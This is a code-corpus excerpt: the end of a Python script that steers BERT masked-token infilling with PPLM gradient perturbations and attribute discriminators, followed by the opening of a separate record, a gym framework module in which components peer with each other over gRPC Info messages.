loss.data.cpu().numpy())\n if loss_type == PPLM_DISCRIM or loss_type == PPLM_BOW_DISCRIM:\n ce_loss = torch.nn.CrossEntropyLoss()\n\n # curr_score = torch.unsqueeze(probs, dim=1)\n ##For bert horizon_length should always be 0! so the below part is not necessary\n horizon_length = 0\n # wte = model.resize_token_embeddings()\n # for _ in range(horizon_length):\n # inputs_embeds = torch.matmul(curr_score, wte.weight.data)\n # _, curr_unpert_past, curr_all_hidden = model(\n # past=curr_unpert_past,\n # inputs_embeds=inputs_embeds\n # )\n # curr_hidden = curr_all_hidden[-1]\n # new_accumulated_hidden = new_accumulated_hidden + torch.sum(\n # curr_hidden, dim=1)\n #TODO do we include the bos and eos tokens?\n prediction = classifier(new_accumulated_hidden /\n sentence_length)\n\n label = torch.tensor(class_label,\n device=device,\n dtype=torch.long)\n #had to have a dimension for batchsize\n discrim_loss = ce_loss(prediction.unsqueeze(0), label.unsqueeze(0))\n if verbosity_level >= VERY_VERBOSE:\n print(\" pplm_discrim_loss:\", discrim_loss.data.cpu().numpy())\n loss += discrim_loss\n loss_list.append(discrim_loss)\n\n kl_loss = 0.0\n if kl_scale > 0.0:\n #calculate kl loss\n unpert_probs = F.softmax(unpert_logits[0, masked_indices, :], dim=-1)\n unpert_probs = (\n unpert_probs + SMALL_CONST *\n (unpert_probs <= SMALL_CONST).float().to(device).detach()\n )\n correction = SMALL_CONST * (probs <= SMALL_CONST).float().to(\n device).detach()\n corrected_probs = probs + correction.detach()\n kl_loss = kl_scale * (\n (corrected_probs * (corrected_probs / unpert_probs).log()).sum()\n )\n if verbosity_level >= VERY_VERBOSE:\n print(' kl_loss', kl_loss.data.cpu().numpy())\n loss += kl_loss\n\n loss_per_iter.append(loss.data.cpu().numpy())\n if verbosity_level >= VERBOSE:\n print(' pplm_loss', (loss - kl_loss).data.cpu().numpy())\n\n # compute gradients\n loss.backward()\n\n # calculate gradient norms\n # TODO Double check if we indid only calculated grad on (K,V) pairs of the masked tokens\n if grad_norms is not None and loss_type == PPLM_BOW:\n grad_norms = [torch.max(grad_norms[index], torch.norm(p_.grad * window_mask))\n for index, p_ in enumerate(curr_perturbation)]\n else:\n grad_norms = [ (torch.norm(p_.grad * window_mask) + SMALL_CONST)\n for index, p_ in enumerate(curr_perturbation)]\n\n # normalize gradients\n grad = [\n -stepsize *\n (p_.grad * window_mask / grad_norms[\n index] ** gamma).data.cpu().numpy()\n for index, p_ in enumerate(curr_perturbation)\n ]\n\n # accumulate gradient\n grad_accumulator = list(map(add, 
grad, grad_accumulator))\n\n # reset gradients, just to make sure\n for p_ in curr_perturbation:\n p_.grad.data.zero_()\n\n # removing past from the graph\n # new_past = []\n # for p_ in past:\n # new_past.append(p_.detach())\n # past = new_past\n\n # apply the accumulated perturbations to the past\n ##\n grad_accumulator = [\n to_var(torch.from_numpy(p_), requires_grad=True, device=device)\n for p_ in grad_accumulator\n ]\n perturbed_hidden = list(map(add, all_hidden, grad_accumulator))\n\n return perturbed_hidden, new_accumulated_hidden, grad_norms, loss_per_iter\n\n\ndef full_text_generation_bert(\n model,\n tokenizer,\n context=None,\n masked_indices = None,\n masked_lm_labels = None,\n num_samples=1,\n device=\"cuda\",\n bag_of_words=None,\n discrim=None,\n class_label=None,\n stepsize=0.02,\n temperature=1.0,\n top_k=10,\n sample=True,\n num_iterations=3,\n grad_length=10000,\n horizon_length=1,\n window_length=0,\n decay=False,\n gamma=1.5,\n gm_scale=0.9,\n kl_scale=0.01,\n verbosity_level=REGULAR,\n **kwargs\n):\n classifier, class_id = get_classifier( discrim, class_label, device )\n\n bow_indices = []\n if bag_of_words:\n bow_indices = get_bag_of_words_indices_bert(bag_of_words.split(\";\"),\n tokenizer)\n\n if bag_of_words and classifier:\n loss_type = PPLM_BOW_DISCRIM\n if verbosity_level >= REGULAR:\n print(\"Both PPLM-BoW and PPLM-Discrim are on. \"\n \"This is not optimized.\")\n\n elif bag_of_words:\n loss_type = PPLM_BOW\n if verbosity_level >= REGULAR:\n print(\"Using PPLM-BoW\")\n\n elif classifier is not None:\n loss_type = PPLM_DISCRIM\n if verbosity_level >= REGULAR:\n print(\"Using PPLM-Discrim\")\n\n else:\n raise Exception(\"Specify either a bag of words or a discriminator\")\n\n unpert_gen_tok_text, _, _ = generate_text_pplm_bert(\n #this is just letting bert does its job without changing anything\n model=model,\n tokenizer=tokenizer,\n masked_indices = masked_indices,\n masked_lm_labels=masked_lm_labels,\n context=context,\n device=device,\n sample=sample,\n perturb=False,\n verbosity_level=verbosity_level\n )\n if device == 'cuda':\n torch.cuda.empty_cache()\n\n pert_gen_tok_texts = []\n discrim_losses = []\n losses_in_time = []\n for i in range(num_samples):\n pert_gen_tok_text, discrim_loss, loss_in_time = generate_text_pplm_bert(\n model=model,\n tokenizer=tokenizer,\n context=context,\n masked_indices = masked_indices,\n masked_lm_labels=masked_lm_labels,\n device=device,\n perturb=True,\n bow_indices=bow_indices,\n classifier=classifier,\n class_label=class_id,\n loss_type=loss_type,\n stepsize=stepsize,\n temperature=temperature,\n top_k=top_k,\n sample=sample,\n num_iterations=num_iterations,\n grad_length=grad_length,\n horizon_length=horizon_length,\n decay=decay,\n gamma=gamma,\n gm_scale=gm_scale,\n kl_scale=kl_scale,\n verbosity_level=verbosity_level\n )\n pert_gen_tok_texts.append(pert_gen_tok_text)\n if classifier is not None:\n discrim_losses.append(discrim_loss.data.cpu().numpy())\n losses_in_time.append(loss_in_time)\n\n if device == 'cuda':\n torch.cuda.empty_cache()\n\n return unpert_gen_tok_text, pert_gen_tok_texts, discrim_losses, losses_in_time\n\n\ndef generate_text_pplm_bert(\n model,\n tokenizer,\n context=None,\n masked_indices = None,\n masked_lm_labels = None,\n all_hidden=None,\n device=\"cuda\",\n perturb=True,\n bow_indices=None,\n classifier=None,\n class_label=None,\n loss_type=0,\n stepsize=0.02,\n temperature=1.0,\n top_k=10,\n sample=True,\n num_iterations=3,\n grad_length=10000,\n horizon_length=1,\n window_length=0,\n 
decay=False,\n    gamma=1.5,\n    gm_scale=0.9,\n    kl_scale=0.01,\n    verbosity_level=REGULAR\n):\n    context_t = torch.tensor(context, device=device, dtype=torch.long)\n    while len(context_t.shape) < 2:\n        context_t = context_t.unsqueeze(0)\n    output_so_far = context_t\n    # collect one hot vectors for bags of words\n    one_hot_bows_vectors = build_bows_one_hot_vectors(bow_indices, tokenizer, device)\n    grad_norms = None\n    last = None\n    unpert_discrim_loss = 0\n    loss_in_time = []\n\n    # if verbosity_level >= VERBOSE:\n    #     range_func = trange(len(masked_indices), ascii=True)\n    # else:\n    #     range_func = range(len(masked_indices))\n\n    # for now, predict all the masked words at the same time\n    # Get past/probs for current output, except for last word\n    # Note that GPT takes 2 inputs: past + current_token\n    # run model forward to obtain unperturbed hidden states\n\n    if all_hidden is None and output_so_far is not None:\n        # if there is some context\n        if output_so_far.shape[1] > 1:\n            _, _, all_hidden = model(input_ids=output_so_far, masked_lm_labels=masked_lm_labels)\n    # sequence_output, pooled_output, (hidden_states), (attentions)\n    unpert_mlm_loss, unpert_pred_logits, unpert_all_hidden = model(input_ids=context_t, masked_lm_labels=masked_lm_labels)\n    # unpert_all_hidden : 12+1 layers, [1,sent_len,768]\n    # get the last layer, this will be used for prediction and loss calculation\n    unpert_hidden_ll = unpert_all_hidden[-1]\n\n    # finished unperturbed outputting\n    # check if we are above grad max length\n    # if i >= grad_length:\n    #     current_stepsize = stepsize * 0\n    # else:\n    #     current_stepsize = stepsize\n    current_stepsize = stepsize\n    # modify the past if necessary\n    if not perturb or num_iterations == 0:\n        pert_all_hidden = unpert_all_hidden\n\n    else:\n        #TODO fix this\n        if all_hidden is not None:\n            pert_all_hidden, _, grad_norms, loss_this_iter = perturb_hidden_bert(\n                all_hidden,\n                model,\n                masked=None,\n                context=context_t,\n                masked_lm_labels=masked_lm_labels,\n                unpert_all_hidden=unpert_all_hidden,\n                unpert_logits=unpert_pred_logits,\n                grad_norms=grad_norms,\n                stepsize=current_stepsize,\n                one_hot_bows_vectors=one_hot_bows_vectors,\n                classifier=classifier,\n                class_label=class_label,\n                loss_type=loss_type,\n                num_iterations=num_iterations,\n                horizon_length=horizon_length,\n                decay=decay,\n                gamma=gamma,\n                kl_scale=kl_scale,\n                device=device,\n                verbosity_level=verbosity_level\n            )\n            loss_in_time.append(loss_this_iter)\n        # else:\n        #     pert_past = past\n    # Note: we feed the perturbed hidden representations (not input ids) back\n    # through the prediction head to obtain the new logits.\n    last_hidden = pert_all_hidden[-1]\n    pert_logits = model.cls(last_hidden)\n    pert_probs = F.softmax(pert_logits, dim=-1)\n    # pert_mlm_loss, pert_pred_logits, pert_all_hidden = model(input_ids=context_t, masked_lm_labels=masked_lm_labels)\n    ### here only take the last logit as the output\n    pert_logits = pert_logits[0] / temperature  # + SMALL_CONST\n    pert_probs = F.softmax(pert_logits, dim=-1)\n\n    if classifier is not None:\n        ce_loss = torch.nn.CrossEntropyLoss()\n        prediction = classifier(torch.mean(unpert_hidden_ll, dim=1))\n        label = torch.tensor([class_label], device=device,\n                             dtype=torch.long)\n        unpert_discrim_loss = ce_loss(prediction, label)\n        if verbosity_level >= VERBOSE:\n            print(\n                \"unperturbed discrim loss\",\n                unpert_discrim_loss.data.cpu().numpy()\n            )\n    else:\n        unpert_discrim_loss = 0\n\n    # Fuse the modified model and original model\n    if perturb:\n\n        unpert_probs = F.softmax(unpert_pred_logits[0], dim=-1)\n\n        pert_probs = ((pert_probs ** gm_scale) * (\n            unpert_probs ** (1 - gm_scale)))  # + SMALL_CONST\n        pert_probs = top_k_filter(pert_probs, k=top_k,\n                                  probs=True)  # + SMALL_CONST\n\n        # rescale\n        if torch.sum(pert_probs) <= 1:\n            pert_probs = pert_probs / torch.sum(pert_probs)\n\n    else:\n        pert_logits = top_k_filter(pert_logits, k=top_k)  # + SMALL_CONST\n        pert_probs = F.softmax(pert_logits, dim=-1)\n\n    # sample or greedy\n    # TODO Actually we might not need to sample the actual words, but just take the representations.\n    if sample:\n        prediction = torch.multinomial(pert_probs, num_samples=1)\n\n    else:\n        _, prediction = torch.topk(pert_probs, k=2, dim=-1)\n\n    output_so_far = [context[i] if masked_lm_labels[0][i].item() == -100 else prediction[i].item() for i in range(len(context))]\n    if verbosity_level >= REGULAR:\n        print(tokenizer.decode(output_so_far))\n\n    return output_so_far, unpert_discrim_loss, loss_in_time\n\ndef set_generic_model_params(discrim_weights, discrim_meta):\n    if discrim_weights is None:\n        raise ValueError('When using a generic discriminator, '\n                         'discrim_weights need to be specified')\n    if discrim_meta is None:\n        raise ValueError('When using a generic discriminator, '\n                         'discrim_meta need to be specified')\n\n    with open(discrim_meta, 'r') as discrim_meta_file:\n        meta = json.load(discrim_meta_file)\n    meta['path'] = discrim_weights\n    DISCRIMINATOR_MODELS_PARAMS['generic'] = meta\n\ndef get_classifier(\n    name: Optional[str],\n    class_label: Union[str, int],\n    device: str,\n    verbosity_level: int = REGULAR\n) -> Tuple[Optional[ClassificationHead], Optional[int]]:\n    if name is None:\n        return None, None\n\n    params = DISCRIMINATOR_MODELS_PARAMS[name]\n    classifier = ClassificationHead(\n        class_size=params['class_size'],\n        embed_size=params['embed_size']\n    ).to(device)\n    if \"url\" in params:\n        resolved_archive_file = cached_path(params[\"url\"])\n    elif \"path\" in params:\n        resolved_archive_file = params[\"path\"]\n    else:\n        raise ValueError(\"Either url or path have to be specified \"\n                         \"in the discriminator model parameters\")\n    classifier.load_state_dict(\n        torch.load(resolved_archive_file, map_location=device))\n    classifier.eval()\n\n    if isinstance(class_label, str):\n        if class_label in params[\"class_vocab\"]:\n            label_id = params[\"class_vocab\"][class_label]\n        else:\n            label_id = params[\"default_class\"]\n            if verbosity_level >= REGULAR:\n                print(\"class_label {} not in class_vocab\".format(class_label))\n                print(\"available values are: {}\".format(params[\"class_vocab\"]))\n                print(\"using default class {}\".format(label_id))\n\n    elif isinstance(class_label, int):\n        
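# (added) integer labels are only accepted if they match a known class id;\n        # anything else falls back to default_class, mirroring the string branch above.\n        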
if class_label in set(params[\"class_vocab\"].values()):\n label_id = class_label\n else:\n label_id = params[\"default_class\"]\n if verbosity_level >= REGULAR:\n print(\"class_label {} not in class_vocab\".format(class_label))\n print(\"available values are: {}\".format(params[\"class_vocab\"]))\n print(\"using default class {}\".format(label_id))\n\n else:\n label_id = params[\"default_class\"]\n\n return classifier, label_id\n\ndef get_score(token_ids, model, classifier, device):\n token_ids_tensor = torch.tensor(token_ids, dtype=torch.long).unsqueeze(0).to(device)\n _,all_hidden = model(input_ids = token_ids_tensor)\n accumulated_hidden = all_hidden[-1].sum(1)[0]\n sentence_length = len(all_hidden)\n prob = F.softmax(classifier(accumulated_hidden / sentence_length))\n score = [p.item() for p in prob]\n return score\n\n\ndef selective_mask(raw_text, mask_prob, model, tokenizer, classifier, class_id, device, strategy = 'pick_best'):\n # The goal is to mask our tokens to maximize the prob of the class_id\n tokens = tokenizer.tokenize(raw_text)\n #Notice that len(token_ids) = len(tokens) + 2\n token_ids = tokenizer.encode(raw_text) \n sentence_length = len(token_ids)\n #at least mask out 1 token\n mask_num = max(int(mask_prob * (sentence_length - 2)), 1)\n scores = []\n curr_tokens = tokens \n curr_token_ids = token_ids \n curr_score = None\n masked_indices = []\n \n init_score = get_score(token_ids, model, classifier, device)\n if strategy == 'iterative':\n print (tokens)\n for i in range(mask_num):\n # print ('Masking the {}th token of all {} tokens to be masked.'.format(i, mask_num))\n curr_token_ids_tensor = torch.tensor(curr_token_ids, dtype=torch.long).unsqueeze(0).to(device)\n _,all_hidden = model(input_ids = curr_token_ids_tensor)\n if curr_score is None:\n curr_score = init_score\n all_new_probs = []\n for tok_no, tok in enumerate(curr_tokens):\n if tok == '[MASK]' or tok in [',', '.', ':',';', '?', '!']:\n all_new_probs.append(-1000)\n continue\n #iteratively mask out each tok and see how the score changes\n masked_token_ids = curr_token_ids.copy()\n #plus one because token\n masked_token_ids[tok_no + 1] = tokenizer.mask_token_id\n new_score = get_score(masked_token_ids, model, classifier, device)\n all_new_probs.append(new_score[class_id])\n diff = new_score[class_id] - curr_score[class_id]\n # print ('{} , newprob {}, diff = {}'.format(tok, new_score, diff))\n best_tok_id = np.argmax(all_new_probs)\n #TODO needs fixing\n masked_score = all_new_probs[best_tok_id]\n # print ('Masking out \"{}\" '.format(curr_tokens[best_tok_id]))\n curr_tokens[best_tok_id] = '[MASK]'\n curr_token_ids[best_tok_id + 1] = tokenizer.mask_token_id\n #added 1 here\n masked_indices.append(best_tok_id +1)\n # print ('After masking --- \"{}\" '.format(' '.join(curr_tokens)) )\n # print ('masked_indices: {} '.format(masked_indices) )\n \n elif strategy == 'pick_best':\n num_reinit = 10\n # re init several times, each time mask out same amount of words, \n # pick the sentence with the highest score of the target class?\n # or lowest score for the initial class?\n all_score, all_masked_indices = [],[]\n for _ in range(num_reinit):\n curr_token_ids = token_ids.copy()\n masked_indices_cand = np.random.choice(range(len(tokens)), mask_num)\n all_masked_indices.append(masked_indices_cand)\n for m_id in masked_indices_cand:\n curr_token_ids[m_id + 1] = tokenizer.mask_token_id\n print (curr_token_ids)\n new_score = get_score(curr_token_ids, model, classifier, device)\n all_score.append(new_score)\n best_ind = 
np.argmax([s[class_id] for s in all_score])\n        masked_indices = all_masked_indices[best_ind]\n        # add 1 to account for the [cls] token at position 0\n        masked_indices = [m + 1 for m in masked_indices]\n        masked_score = all_score[best_ind]\n\n    return masked_indices, init_score, masked_score\n\ndef run_pplm_example_bert(\n    pretrained_model=\"bert-base-cased\",\n    mask_prob=0.5,\n    do_selective_mask=True,\n    cond_text=\"\",\n    num_samples=1,\n    bag_of_words=None,\n    discrim=None,\n    discrim_weights=None,\n    discrim_meta=None,\n    class_label=-1,\n    length=100,\n    stepsize=0.02,\n    temperature=1.0,\n    top_k=10,\n    sample=True,\n    num_iterations=3,\n    grad_length=10000,\n    horizon_length=1,\n    decay=False,\n    gamma=1.5,\n    gm_scale=0.9,\n    kl_scale=0.01,\n    seed=0,\n    no_cuda=False,\n    colorama=False,\n    strategy='pick_best',\n    verbosity='regular',\n    return_sent=False\n):\n    ## This is the main function for bert\n\n    # set random seed\n    torch.manual_seed(seed)\n    np.random.seed(seed)\n\n    # set verbosity\n    verbosity_level = VERBOSITY_LEVELS.get(verbosity.lower(), REGULAR)\n\n    # set the device\n    device = \"cuda\" if torch.cuda.is_available() and not no_cuda else \"cpu\"\n\n    ### set discriminator? TODO need to figure this part out. where is this used\n    # Modifies the global variables\n    if discrim == 'generic':\n        set_generic_model_params(discrim_weights, discrim_meta)\n    if discrim is not None:\n        discriminator_pretrained_model = DISCRIMINATOR_MODELS_PARAMS[discrim][\n            \"pretrained_model\"\n        ]\n        if pretrained_model != discriminator_pretrained_model:\n            pretrained_model = discriminator_pretrained_model\n            if verbosity_level >= REGULAR:\n                print(\"discrim = {}, pretrained_model set \"\n                      \"to discriminator's = {}\".format(discrim, pretrained_model))\n\n    # load pretrained model\n    model = BertForMaskedLM.from_pretrained(\n        pretrained_model,\n        output_hidden_states=True\n    )\n    model.to(device)\n    model.eval()\n\n    # load tokenizer\n    tokenizer = BertTokenizer.from_pretrained(pretrained_model)\n\n    # Freeze Bert weights so gradients only flow into the perturbations\n    for param in model.parameters():\n        param.requires_grad = False\n\n    # figure out conditioning text\n    # if uncond, use start of sentence as the prompt\n    # we need to change this into a whole sentence\n\n    raw_text = cond_text\n\n    while not raw_text:\n        print(\"Did you forget to add `--cond_text`?\")\n        raw_text = input(\"Model prompt >>> \")\n    ## Different: we are also adding the eos token now (as opposed to only bos)\n    tokenized_cond_text = tokenizer.encode(raw_text)\n\n    print(\"= Original sentence =\")\n    print(tokenizer.decode(tokenized_cond_text))\n    print()\n    # randomly mask out a certain percentage of tokens or do_selective\n    sent_len = len(tokenized_cond_text)-2\n    # masked_indices = np.random.choice( range(1, len(tokenized_cond_text)-1), int(sent_len * mask_prob))\n\n    # add a function to mask out indices that \n    if discrim is not None and do_selective_mask:\n        classifier, class_id = get_classifier( discrim, class_label, device )\n        masked_indices, init_score, masked_score = selective_mask(raw_text, mask_prob, model, tokenizer, classifier, class_id, device, strategy)\n        orig_scores = [init_score, masked_score, ]\n\n    # masked_indices = np.array([5,6,7])\n\n    # get the mask labels\n    # NOTE: newer transformers versions changed the masked-LM ignore_index to -100\n    masked_lm_labels = [[-100 for _ in range(len(tokenized_cond_text))]]\n    for ind in masked_indices:\n        masked_lm_labels[0][ind] = tokenized_cond_text[ind]\n    masked_lm_labels = torch.tensor(masked_lm_labels, device=device, dtype=torch.long)\n    for ind in masked_indices:\n        tokenized_cond_text[ind] = tokenizer.convert_tokens_to_ids(tokenizer.mask_token)\n    # print the masked version of the input text\n    print(\"After masking\")\n    masked_text = tokenizer.decode(tokenized_cond_text)\n    print(masked_text)\n\n\n    # generate unperturbed and perturbed texts\n\n    # full_text_generation returns:\n    # unpert_gen_tok_text, pert_gen_tok_texts, discrim_losses, losses_in_time\n    # bert-completed sentence without perturbing\n    unpert_gen_tok_text, pert_gen_tok_texts, _, _ = full_text_generation_bert(\n        model=model,\n        tokenizer=tokenizer,\n        context=tokenized_cond_text,\n        masked_indices=masked_indices,\n        masked_lm_labels=masked_lm_labels,\n        device=device,\n        num_samples=num_samples,\n        bag_of_words=bag_of_words,\n        discrim=discrim,\n        class_label=class_label,\n        stepsize=stepsize,\n        temperature=temperature,\n        top_k=top_k,\n        sample=sample,\n        num_iterations=num_iterations,\n        grad_length=grad_length,\n        horizon_length=horizon_length,\n        decay=decay,\n        gamma=gamma,\n        gm_scale=gm_scale,\n        kl_scale=kl_scale,\n        verbosity_level=verbosity_level\n    )\n\n    # untokenize unperturbed text\n    print('UNPERT\\n')\n    unpert_gen_text = tokenizer.decode(unpert_gen_tok_text)\n\n    if verbosity_level >= REGULAR:\n        print(\"=\" * 80)\n        print(\"= Unperturbed generated text =\")\n        print(unpert_gen_text)\n        print()\n\n    generated_texts = []\n\n    bow_word_ids = set()\n    if bag_of_words and colorama:\n        bow_indices = get_bag_of_words_indices_bert(bag_of_words.split(\";\"),\n                                                    tokenizer)\n        for single_bow_list in bow_indices:\n            # filtering all words in the list composed of more than 1 token\n            filtered = list(filter(lambda x: len(x) <= 1, single_bow_list))\n            # w[0] because we are sure w has only 1 item because of the previous filter\n            bow_word_ids.update(w[0] for w in filtered)\n    # iterate through the perturbed texts\n    for i, pert_gen_tok_text in enumerate(pert_gen_tok_texts):\n        try:\n            # untokenize perturbed text\n            if colorama:\n                import colorama\n\n                pert_gen_text = ''\n                for word_id in pert_gen_tok_text.tolist()[0]:\n                    if word_id in bow_word_ids:\n                        pert_gen_text += '{}{}{}'.format(\n                            colorama.Fore.RED,\n                            tokenizer.decode([word_id]),\n                            colorama.Style.RESET_ALL\n                        )\n                    else:\n                        pert_gen_text += tokenizer.decode([word_id])\n            else:\n                pert_gen_text = tokenizer.decode(pert_gen_tok_text)\n\n            print(\"= Perturbed generated text {} =\".format(i + 1))\n            
print(pert_gen_text)\n            print()\n        except Exception:\n            pass\n        # keep the prefix, perturbed seq, original seq for each index\n        # return should contain: masked sentence, pert_gen_text, unpert_gen_text\n        # scores = [initial_score, score_after_masking, score_after_filling_in]\n        new_score = get_score(pert_gen_tok_text, model, classifier, device)\n        generated_texts.append(\n            (pert_gen_text, unpert_gen_text, new_score)\n        )\n    if return_sent:\n        return [masked_text, orig_scores, generated_texts]\n    return\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\n        \"--pretrained_model\",\n        \"-M\",\n        type=str,\n        default=\"bert-base-cased\",\n        help=\"pretrained model name or path to local checkpoint\",\n    )\n    parser.add_argument(\n        \"--cond_text\", type=str, default=\"The lake\",\n        help=\"Prefix texts to condition on\"\n    )\n\n    parser.add_argument(\n        \"--num_samples\",\n        type=int,\n        default=1,\n        help=\"Number of samples to generate from the modified latents\",\n    )\n    parser.add_argument(\n        \"--bag_of_words\",\n        \"-B\",\n        type=str,\n        default=None,\n        help=\"Bags of words used for PPLM-BoW. \"\n             \"Either a BOW id (see list in code) or a filepath. \"\n             \"Multiple BoWs separated by ;\",\n    )\n    parser.add_argument(\n        \"--discrim\",\n        \"-D\",\n        type=str,\n        default=None,\n        choices=(\"clickbait\", \"sentiment\", \"toxicity\", \"generic\"),\n        help=\"Discriminator to use\",\n    )\n    parser.add_argument('--discrim_weights', type=str, default=None,\n                        help='Weights for the generic discriminator')\n    parser.add_argument('--discrim_meta', type=str, default=None,\n                        help='Meta information for the generic discriminator')\n    parser.add_argument(\n        \"--class_label\",\n        type=int,\n        default=-1,\n        help=\"Class label used for the discriminator\",\n    )\n    parser.add_argument(\"--length\", type=int, default=100)\n    parser.add_argument(\"--stepsize\", type=float, default=0.02)\n    parser.add_argument(\"--temperature\", type=float, default=1.0)\n    parser.add_argument(\"--top_k\", type=int, default=10)\n    parser.add_argument(\n        \"--sample\", action=\"store_true\",\n        help=\"Sample tokens from the fused distribution instead of greedy decoding\"\n    )\n    parser.add_argument(\"--num_iterations\", type=int, default=3)\n    parser.add_argument(\"--grad_length\", type=int, default=10000)\n    # parser.add_argument(\n    #     \"--window_length\",\n    #     type=int,\n    #     default=0,\n    #     help=\"Length of past which is being optimized; \"\n    #          \"0 corresponds to infinite window length\",\n    # )\n    parser.add_argument(\n        \"--horizon_length\",\n        type=int,\n        default=1,\n        help=\"Length of future to optimize over\",\n    )\n    parser.add_argument(\"--decay\", action=\"store_true\",\n                        help=\"whether to decay or not\")\n    parser.add_argument(\"--gamma\", type=float, default=1.5)\n    parser.add_argument(\"--gm_scale\", type=float, default=0.9)\n    parser.add_argument(\"--kl_scale\", type=float, default=0.01)\n    parser.add_argument(\"--seed\", type=int, default=0)\n    parser.add_argument(\"--no_cuda\", action=\"store_true\", help=\"no cuda\")\n    parser.add_argument(\"--colorama\", action=\"store_true\",\n                        help=\"colors keywords\")\n    parser.add_argument(\"--verbosity\", type=str, default=\"very_verbose\",\n                        choices=(\n                            \"quiet\", \"regular\", \"verbose\", \"very_verbose\"),\n                        help=\"verbosity level\")\n\n    parser.add_argument(\"--strategy\", type=str, default='pick_best')\n\n    args = parser.parse_args()\n    
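# Example invocation (hypothetical values; --mask_prob and --do_selective_mask\n    # are not exposed by this parser, so their defaults of 0.5/True apply):\n    #   python run_pplm_bert.py -D sentiment --class_label 2 --cond_text \"The lake was calm.\" --num_iterations 10 --stepsize 0.03 --kl_scale 0.01 --gm_scale 0.95\n    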
run_pplm_example_bert(**vars(args))\n","sub_path":"run_pplm_bert.py","file_name":"run_pplm_bert.py","file_ext":"py","file_size_in_byte":37842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"75861143","text":"import json\nimport asyncio\nimport logging\nfrom datetime import datetime\n\nfrom grpclib.client import Channel\nfrom grpclib.exceptions import GRPCError\n\nfrom google.protobuf import json_format\n\nfrom gym.common.status import Status\nfrom gym.common.tools import Tools\n\nfrom gym.common.protobuf.gym_grpc import (\n AgentStub,\n MonitorStub,\n ManagerStub,\n PlayerStub,\n InfraStub,\n)\nfrom gym.common.protobuf.gym_pb2 import (\n Result,\n Task,\n Report,\n Instruction,\n Action,\n Snapshot,\n Info,\n Deploy,\n)\n\nfrom gym.common.vnfbr import VNFBR\nfrom gym.common.vnfbd import VNFBD\nfrom gym.common.vnfpp import VNFPP\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Core:\n def __init__(self, info):\n self.status = Status(info)\n asyncio.create_task(self.greet(info, startup=True))\n\n async def _reach(self, stub, contacts=[]):\n \"\"\"Reaches a stub using the Greet gRPC service call\n handling the info message back into a dict\n\n Arguments:\n stub {gRPC stub/client} -- A gRPC stub that interfaces\n the info function call in a remote peer\n\n Keyword Arguments:\n contacts {list} -- The contacts that must be included\n in the info message, so the peer being contacted can\n reach this list of contacts and retrieve their info\n too (default: {[]})\n\n Returns:\n dict -- The info of the contacted peer to be used\n to build its Identity, and so be added to the peers\n database of the Core status\n \"\"\"\n profile = self.status.profile()\n info = json_format.ParseDict(profile, Info())\n\n if contacts:\n for contact in contacts:\n info.contacts.append(contact)\n\n try:\n reply = await stub.Greet(info)\n info_reply = json_format.MessageToDict(\n reply, preserving_proto_field_name=True\n )\n\n except GRPCError as e:\n logger.info(f\"Error in reaching: Greet Info\")\n logger.debug(f\"Exception in Greet: {e}\")\n info_reply = {}\n\n except OSError as e:\n logger.info(f\"Could not reach channel for Greet Info\")\n logger.debug(f\"Exception: {e}\")\n info_reply = {}\n\n finally:\n return info_reply\n\n async def _contact(self, role, host, port, contacts=[]):\n \"\"\"Establishes the contact with a remote peer having\n the provided role (to be able to build the proper stub) at the\n specified host:port params.\n\n Arguments:\n role {string} -- Role of the peer being contacted\n host {string} -- IP address of the peer being contacted\n port {string} -- Port address of the peer being contacted\n\n Keyword Arguments:\n contacts {list} -- List of contacts the peer being contact\n must also greet and retrieve info (default: {[]})\n \"\"\"\n stubs = {\n \"agent\": AgentStub,\n \"monitor\": MonitorStub,\n \"manager\": ManagerStub,\n \"player\": PlayerStub,\n }\n\n channel = Channel(host, port)\n stub_class = stubs.get(role, None)\n\n if stub_class:\n logger.info(f\"Contacting {role} at {host}:{port}\")\n stub = stub_class(channel)\n info = await self._reach(stub, contacts)\n\n if info:\n self.status.add_peer(info)\n else:\n logger.info(f\"Could not contact {host}:{port}\")\n else:\n logger.info(f\"Could not contact role {role} - \" f\"no stub/client available\")\n\n channel.close()\n\n async def greet(self, info, startup=False):\n \"\"\"Establishes peering with a contact (another gym component)\n that has the provided fields defined by the 
info param.\n        At startup waits a bit so agent/monitor can load its tools\n        before greetings.\n\n        Arguments:\n            info {dict} -- Set of information that enables a contact\n            to be reached and become a peer\n\n        Keyword Arguments:\n            startup {bool} -- A flag that signals if the App is\n            in startup mode. This function can be called to reach\n            contacts at run-time too. (default: {False})\n        \"\"\"\n        if startup:\n            await asyncio.sleep(0.5)\n\n        contacts = info.get(\"contacts\")\n        allowed_contacts = self.status.allows(contacts)\n\n        if allowed_contacts:\n            logger.info(f\"Greeting contacts: {allowed_contacts}\")\n\n            for contact in allowed_contacts:\n                role, address = contact.split(\"/\")\n                host, port = address.split(\":\")\n                contacts_peers = info.get(\"peers\")\n                await self._contact(role, host, port, contacts_peers)\n        else:\n            logger.info(f\"No greetings, contacts empty: {allowed_contacts}\")\n\n        if startup:\n            logger.info(f\"Ready!\")\n\n    async def info(self, message):\n        \"\"\"This function is called every time a gym component\n        receives an Info gRPC service call. So it adds the peer to its\n        database, and if the message contains contacts, it tries to\n        greet those contacts before replying the Info.\n        In summary, gym components exchange Info messages to\n        establish peering, i.e., they add the peer info to their\n        peers database.\n\n        Arguments:\n            message {Info} -- An Info type of gRPC message containing\n            the info about the peer that is contacting/calling\n\n        Returns:\n            Info -- An Info type of gRPC message containing the profile\n            information of this peer to be sent to the other peer.\n        \"\"\"\n        logger.info(\"Received Info\")\n        logger.debug(f\"{json_format.MessageToJson(message)}\")\n        info = json_format.MessageToDict(message, preserving_proto_field_name=True)\n\n        await self.greet(info)\n\n        self.status.add_peer(info)\n        reply = Info()\n        profile = self.status.profile()\n        reply = json_format.ParseDict(profile, Info())\n\n        logger.info(\"Replying Info\")\n        logger.debug(f\"{json_format.MessageToJson(reply)}\")\n\n        return reply\n\n\nclass WorkerCore(Core):\n    \"\"\"It is the base class of Agent and Monitor.\n    So it contains an instance of Tools that can\n    load and run probers/listeners.\n\n    Arguments:\n        Core {class} -- Agent and Monitor contain all the\n        behavior of a Core component (i.e., peer\n        with each other exchanging Info messages)\n    \"\"\"\n\n    def __init__(self, info):\n        self.tools = Tools()\n        asyncio.create_task(self.load_tools(info))\n        Core.__init__(self, info)\n\n    def _build_cfg(self, info):\n        \"\"\"Build the dict config that 